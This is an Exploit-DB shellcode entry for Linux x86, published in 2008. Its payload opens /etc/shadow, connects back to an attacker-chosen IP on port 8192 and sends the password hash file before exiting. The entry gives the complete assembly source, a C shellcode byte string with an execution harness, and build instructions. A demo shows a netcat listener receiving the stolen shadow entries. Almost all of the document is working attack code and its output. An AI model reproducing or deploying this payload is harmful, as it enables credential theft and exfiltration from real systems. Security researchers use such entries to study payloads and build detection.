linux/x86 - connect back.send.exit /etc/shadow 155 bytes

2008-08-18T00:00:00
ID EDB-ID:13339
Type exploitdb
Reporter 0in
Modified 2008-08-18T00:00:00

Description

linux/x86 connect back.send.exit /etc/shadow 155 bytes. Shellcode exploit for lin_x86 platform

                                        
                                            ;                           (C)oDed by 0in
;                   Dark-Coders Group Productions
;        [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode]
;   >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<<
;               Contact: 0in[dot]email[at]gmail[dot]com
;           Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned
; Compile:
;       nasm -f elf shellcode.asm
;       ld -o shellcode shellcode.o
; How it works!?
; (1st console) [root@13world]# ./shellcode
; (2nd console) 0in[~]%> nc -v -l -p 8192
; (2nd console)
;Connection from 127.0.0.1:48820
;root:[password here]:13896::::::
;bin:x:0::::::
;daemon:x:0::::::
;mail:x:0::::::
;ftp:x:0::::::
;nobody:x:0::::::
;dbus:!:13716:0:99999:7:::
;zer0in:[password here]:13716:0:99999:7:::
;avahi:!:13716:0:99999:7:::
;hal:!:13716:0:99999:7:::
;clamav:!:13735:0:99999:7:::
;fetchmail:!:13737:0:99999:7:::
;mysql:!:12072:0:99999:7:::
;postfix:!:13798:0:99999:7:::
;mpd:!:13828:0:99999:7:::
;nginx:!:13959:0:99999:7:::
;tomcat:!:14063:0:99999:7:::
;http:!:14075:0:99999:7:::
;snort:!:14075:0:99999:7:::

;The code (Assembler version):

Section .text
    global _start

_start:
          ;open(file,O_RDONLY):
        xor ebx,ebx
        push byte 0x77 ;/etc/shadow
        push word 0x6f64
        push 0x6168732f
        push 0x6374652f; ----------
        mov ebx,esp ; first arg - filename
        xor ax,ax
        inc ax
        inc ax
        inc ax
        inc ax
        inc ax ; ax = 5 (O_RDONLY)
        int 0x80
        mov ebx,eax
        ;read(file,buff,1222):
        xor ax,ax
        inc ax
        inc ax
        inc ax ; syscall id = 3
        mov dx,1222 ; size to read
        push esp
        mov ecx,[esp] ; memory
        int 0x80
        mov esi,eax ; file to ESI
        ;socket(PF_INET,SOCK_STREAM,IPPROTO_IP)
        xor ebx,ebx
        push ebx ;0 ; 3rd arg
        inc ebx
        push ebx ;1 ; 2nd arg
        inc ebx
        push ebx ;2 ; 1st arg
                    ;socketcall()
        mov ax,1666 ;--------------
        sub ax,1564 ;--------------
        xor bx,bx   ; socket() call id
        inc bx      ;- - - - - - - - -
        mov ecx,esp ; socket()
        int 0x80    ; do it!
        pop ebx; clear mem
        ;connect(eax,struct server,16)
                  ;16 - sizeof struct sockaddr
        mov edx, eax
        xor ebx,ebx
        xor ebx,ebx  ; ebx = 0 - IP=0.0.0.0 (set EBX to ur IP)
        push ebx
        mov bx,1666 ; definition of struct sockaddr
        sub bx,1634 ;we cant stay 0x00 here (8192 PORT)
        push bx
        mov al, 2 ;
        push ax
        mov ecx, esp
        mov al, 16
        push eax
        push ecx
        push edx
        mov al, 102
        mov bx,1666
        sub bx,1663 ;---------------------------------
        mov ecx, esp
        int 0x80 ; call connect
        mov ebx,eax ; socket to ebx
        ; Ok! so...
        ; Lets write file to server and go down!
        ;write(socket,file,1222)
        pop ebx
        mov ax,1666
        sub ax,1662
        push esi
        mov dx,16666
        sub dx,15444
        int 0x80
        ;exit(1) :
        xor eax,eax ;----------
        inc eax
        mov ebx,eax ;----------
        int 0x80    ; do it!
;C:
;   #include <stdio.h>
;   char shellcode[]="\x31\xdb"
;   "\x6a\x77"
;   "\x66\x68\x64\x6f"
;   "\x68\x2f\x73\x68\x61"
;   "\x68\x2f\x65\x74\x63"
;   "\x89\xe3"
;   "\x66\x31\xc0"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\xcd\x80"
;   "\x89\xc3"
;   "\x66\x31\xc0"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\x40"
;   "\x66\xba\xc6\x04"
;   "\x54"
;   "\x8b\x0c\x24"
;   "\xcd\x80"
;   "\x89\xc6"
;   "\x31\xdb"
;   "\x53"
;   "\x43"
;   "\x53"
;   "\x43"
;   "\x53"
;   "\x66\xb8\x82\x06"
;   "\x66\x2d\x1c\x06"
;   "\x66\x31\xdb"
;   "\x66\x43"
;   "\x89\xe1"
;   "\xcd\x80"
;   "\x5b"
;   "\x89\xc2"
;   "\x31\xdb"
;   "\x53"
;   "\x66\xbb\x82\x06"
;   "\x66\x81\xeb\x62\x06"
;   "\x66\x53"
;   "\xb0\x02"
;   "\x66\x50"
;   "\x89\xe1"
;   "\xb0\x10"
;   "\x50"
;   "\x51"
;   "\x52"
;   "\xb0\x66"
;   "\x66\xbb\x82\x06"
;   "\x66\x81\xeb\x7f\x06"
;   "\x89\xe1"
;   "\xcd\x80"
;   "\x89\xc3"
;   "\x5b"
;   "\x66\xb8\x82\x06"
;   "\x66\x2d\x7e\x06"
;   "\x56"
;   "\x66\xba\x1a\x41"
;   "\x66\x81\xea\x54\x3c"
;   "\xcd\x80"
;   "\x31\xc0"
;   "\x40"
;   "\x89\xc3"
;   "\xcd\x80";
;   int main(int argc, char **argv)
;    {
;	    int *ret;
;	    ret = (int *)&ret + 2;
;	    (*ret) = (int) shellcode;
;    }

; milw0rm.com [2008-08-18]